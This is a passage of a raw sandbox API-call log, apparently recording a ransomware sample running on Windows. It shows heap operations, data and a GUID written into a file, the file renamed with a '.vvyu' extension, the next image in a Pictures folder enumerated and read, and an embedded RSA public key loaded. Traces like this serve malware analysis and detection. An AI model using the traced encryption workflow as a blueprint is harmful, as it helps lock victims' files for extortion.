[0201.541] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0201.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0201.542] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0201.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2800) returned 0x2ea99b0 [0201.542] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0201.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0201.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0201.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0201.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0201.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0201.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fe40 [0201.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3470 [0201.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fe88 [0201.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3488 [0201.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34b8 [0201.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3518 [0201.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34d0 [0201.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0201.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0201.543] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0201.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0201.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34b8 | out: hHeap=0x620000) returned 1 [0201.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34d0 | out: hHeap=0x620000) returned 1 [0201.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3518 | out: hHeap=0x620000) returned 1 [0201.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0201.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3518 [0201.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a00 [0201.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea34d0 [0201.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0201.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea34b8 [0201.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0201.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0201.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0201.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0201.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0201.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0201.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0201.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0201.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0201.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34d0 | out: hHeap=0x620000) returned 1 [0201.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0201.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34b8 | out: hHeap=0x620000) returned 1 [0201.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0201.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0201.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3518 | out: hHeap=0x620000) returned 1 [0201.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0201.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0201.546] GetCurrentThreadId () returned 0x66c [0201.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0201.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea8988 [0201.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0201.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0201.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0201.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0201.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0201.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.547] GetCurrentThreadId () returned 0x66c [0201.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0201.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0201.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0201.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0201.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0201.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0201.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0201.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0201.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3518 [0201.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0201.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0201.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0201.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0201.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0201.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0201.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0201.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0201.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34b8 [0201.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0201.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0201.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0201.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0201.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0201.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0201.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0201.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea34d0 [0201.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0201.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0201.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0201.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34a0 [0201.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0201.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3530 [0201.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0201.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0201.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0201.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3500 [0201.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0201.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34e8 [0201.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0201.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3548 [0201.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34e8 | out: hHeap=0x620000) returned 1 [0201.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea34e8 [0201.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3500 | out: hHeap=0x620000) returned 1 [0201.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0201.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0201.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0201.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0201.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0201.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34b8 | out: hHeap=0x620000) returned 1 [0201.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea34b8 [0201.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0201.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0201.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3518 | out: hHeap=0x620000) returned 1 [0201.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0201.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3548 | out: hHeap=0x620000) returned 1 [0201.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0201.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.552] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0201.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0201.552] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0201.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34b8 | out: hHeap=0x620000) returned 1 [0201.552] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0201.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0201.553] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0201.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0201.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0201.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0201.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0201.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0201.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0201.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0201.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0201.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34e8 | out: hHeap=0x620000) returned 1 [0201.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0201.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3530 | out: hHeap=0x620000) returned 1 [0201.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0201.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34d0 | out: hHeap=0x620000) returned 1 [0201.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34a0 | out: hHeap=0x620000) returned 1 [0201.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0201.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0201.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0201.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3488 | out: hHeap=0x620000) returned 1 [0201.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8fe88 | out: hHeap=0x620000) returned 1 [0201.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0201.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0201.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0201.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0201.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0201.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0201.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0201.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0201.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0201.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0201.560] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0201.560] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x27f4, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x27f4, lpOverlapped=0x0) returned 1 [0201.560] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0201.560] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x27f9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.560] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0201.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0201.561] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4998 [0201.561] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0201.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0201.561] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0201.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.562] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4998 | out: hHeap=0x620000) returned 1 [0201.562] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0201.562] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0201.562] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0201.562] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0201.563] CloseHandle (hObject=0x510) returned 1 [0201.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91678 [0201.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x2ea6a68 [0201.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91678 | out: hHeap=0x620000) returned 1 [0201.564] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\iIfMhH\\tOBMO.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\iifmhh\\tobmo.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\iIfMhH\\tOBMO.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\iifmhh\\tobmo.gif.vvyu")) returned 1 [0201.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.566] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0201.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ca5e50 | out: hHeap=0x620000) returned 1 [0201.569] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda4b09e0, ftCreationTime.dwHighDateTime=0x1d89cc9, ftLastAccessTime.dwLowDateTime=0x199b4130, ftLastAccessTime.dwHighDateTime=0x1d8a0f0, ftLastWriteTime.dwLowDateTime=0x199b4130, ftLastWriteTime.dwHighDateTime=0x1d8a0f0, nFileSizeHigh=0x0, nFileSizeLow=0xa965, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VL493DrYWM.bmp", cAlternateFileName="VL493D~1.BMP")) returned 1 [0201.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x2ca5e50 [0201.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.569] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\iIfMhH\\VL493DrYWM.bmp") returned=".bmp" [0201.569] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\iIfMhH\\VL493DrYWM.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\iifmhh\\vl493drywm.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0201.570] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=43365) returned 1 [0201.570] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0201.574] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xa93f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.574] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0201.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.577] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.577] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0201.577] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xa965, lpOverlapped=0x0) returned 1 [0201.578] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.578] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0201.578] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.578] lstrlenA (lpString="-----BEGIN PUBLIC 